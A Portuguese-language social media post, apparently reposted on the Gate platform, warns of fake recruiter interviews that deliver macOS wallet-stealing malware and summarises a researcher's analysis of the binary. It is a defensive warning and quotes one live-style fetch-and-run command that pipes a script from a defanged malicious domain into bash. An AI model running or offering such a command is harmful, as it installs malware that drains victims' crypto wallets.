Tenha cuidado com entrevistas de emprego falsas. Elas agora são um dos vetores mais limpos de entrega de malware.


Meu irmão quase foi vítima esta semana.
O passo a passo do esquema:
> Um "recrutador" entra em contato com ele pelo LinkedIn
> Eles realmente leram o seu currículo. sabem qual é a sua stack. agendam uma entrevista real.
> Algumas horas antes da chamada: "Você pode revisar nossa página de produto rapidinho antes de conversarmos?"
> Ao visitar o site, executa-se isto em segundo plano:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
se você digitar sua senha quando solicitado, acabou.
Um pesquisador (Darksp33d no Github) reverse-engineerou o binário:
> cada string de configuração criptografada com 570 funções personalizadas únicas
> uma vez decodificado: servidor c2 completo, lista de endpoints, e um dsn de rastreamento de erros do sentry que se conecta ao desenvolvedor sob intimação legal
> 276 IDs de extensões do Chrome direcionadas, cobrindo 188 carteiras de criptomoedas
> sobreposição de ttp com a "entrevista contagiosa" da DPRK é forte
> 9/64 no virustotal. crowdstrike, sophos, malwarebytes, todos não detectaram
recrutadores de verdade, currículos verdadeiros, vagas reais, site com aparência legítima. uma linha de curl drena suas carteiras.
se um "recrutador" algum dia pedir para você executar algo no seu terminal, mesmo algo tão inocente quanto um script de build antes de uma entrevista técnica, feche a aba.
Ver original
post-image
Esta página pode conter conteúdos de terceiros, que são fornecidos apenas para fins informativos (sem representações/garantias) e não devem ser considerados como uma aprovação dos seus pontos de vista pela Gate, nem como aconselhamento financeiro ou profissional. Consulte a Declaração de exoneração de responsabilidade para obter mais informações.
  • Recompensa
  • Comentar
  • Republicar
  • Partilhar
Comentar
Adicionar um comentário
Adicionar um comentário
Nenhum comentário
  • Fixar